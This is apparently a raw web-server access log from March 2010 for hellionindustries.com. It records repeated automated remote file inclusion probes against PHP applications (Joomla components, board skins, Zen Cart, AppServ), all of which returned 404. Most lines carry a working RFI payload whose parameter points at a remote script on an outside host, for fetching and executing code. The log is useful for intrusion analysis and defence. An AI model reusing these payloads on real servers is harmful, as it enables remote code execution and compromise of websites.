66.249.68.239 - - [11/Mar/2010:06:19:44 -0800] "GET /Sharon_ass.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:06:21:30 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:06:21:30 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:06:21:30 -0800] "GET /logs/access_100225.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:26:47 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:26:47 -0800] "GET //write_comment_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:06:26:48 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:27:19 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:27:20 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:27:25 -0800] "GET /logs/access_100121.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:27:48 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:27:48 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:27:48 -0800] "GET /logs/access_100121.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:27:56 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:00 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:03 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:03 -0800] "GET /logs/access_100121.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:06 -0800] "GET /logs/access_100121.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:06 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:06 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:06 -0800] "GET /logs/access_100121.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:08 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:14 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:21 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:28:22 -0800] "GET /logs/access_100121.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:28:34 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:28:34 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:28:35 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:29:10 -0800] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.16.237.166 - - [11/Mar/2010:06:29:12 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.16.237.166 - - [11/Mar/2010:06:29:12 -0800] "GET /logs/access_091228.log//bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.16.237.166 - - [11/Mar/2010:06:29:12 -0800] "GET /bbs//delete_all.php?board_skin_path=http://saltlux.com/event/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:29:16 -0800] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:29:34 -0800] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:29:50 -0800] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:29:53 -0800] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:30:02 -0800] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:30:48 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:30:48 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:30:49 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:06:30:56 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:06:30:56 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:06:31:03 -0800] "GET /logs/access_091228.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.239.227.209 - - [11/Mar/2010:06:33:08 -0800] "GET /logs/access_100224.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:41 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:41 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:41 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:44 -0800] "GET /logs/access_100121.log////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:46 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:46 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:46 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:50 -0800] "GET /logs/access_100121.log////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:59 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:59 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:36:59 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:37:02 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:37:02 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:37:02 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:37:03 -0800] "GET /logs/access_100121.log////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:37:07 -0800] "GET /logs/access_100121.log////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:38:41 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:38:41 -0800] "GET /logs/access_100121.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:38:42 -0800] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:38:42 -0800] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:38:44 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:38:44 -0800] "GET /logs/access_100121.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:38:49 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:38:54 -0800] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:39:04 -0800] "GET /logs/access_100121.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:39:05 -0800] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:39:16 -0800] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:39:26 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
203.251.80.167 - - [11/Mar/2010:06:39:49 -0800] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:06:40:00 -0800] "GET /logs/access_100121.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:41:05 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:41:05 -0800] "GET /logs/access_090901.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
123.143.29.250 - - [11/Mar/2010:06:41:05 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mendipcastors.co.uk/media/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:41:53 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:41:54 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:41:54 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:42:17 -0800] "GET /appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:42:17 -0800] "GET /logs//appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:42:17 -0800] "GET /logs/access_100121.log//appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:42:18 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:42:18 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:42:19 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:42:19 -0800] "GET /appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:42:19 -0800] "GET /logs//appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:42:19 -0800] "GET /logs/access_100121.log//appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:42:45 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:42:45 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:42:45 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:43:22 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:43:22 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:43:22 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://mapotuntun.co.kr/data/log/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:43:40 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:43:40 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:43:40 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:44:09 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:44:09 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.80.108.81 - - [11/Mar/2010:06:44:09 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://langsat.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:48:24 -0800] "GET /logs//appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:48:24 -0800] "GET /logs/access_100121.log//appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:48:24 -0800] "GET /appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:48:25 -0800] "GET /appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:48:25 -0800] "GET /logs//appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:06:48:25 -0800] "GET /logs/access_100121.log//appserv/main.php?appserv=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:49:56 -0800] "GET /main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:49:56 -0800] "GET /logs//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:49:57 -0800] "GET /logs/access.log//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:50:35 -0800] "GET /logs/access.log//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:50:35 -0800] "GET /logs//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:50:35 -0800] "GET /main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:52:34 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:52:34 -0800] "GET /main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:52:34 -0800] "GET /logs//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:06:52:42 -0800] "GET /logs/access_100121.log%20%20//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
118.129.166.154 - - [11/Mar/2010:06:53:02 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
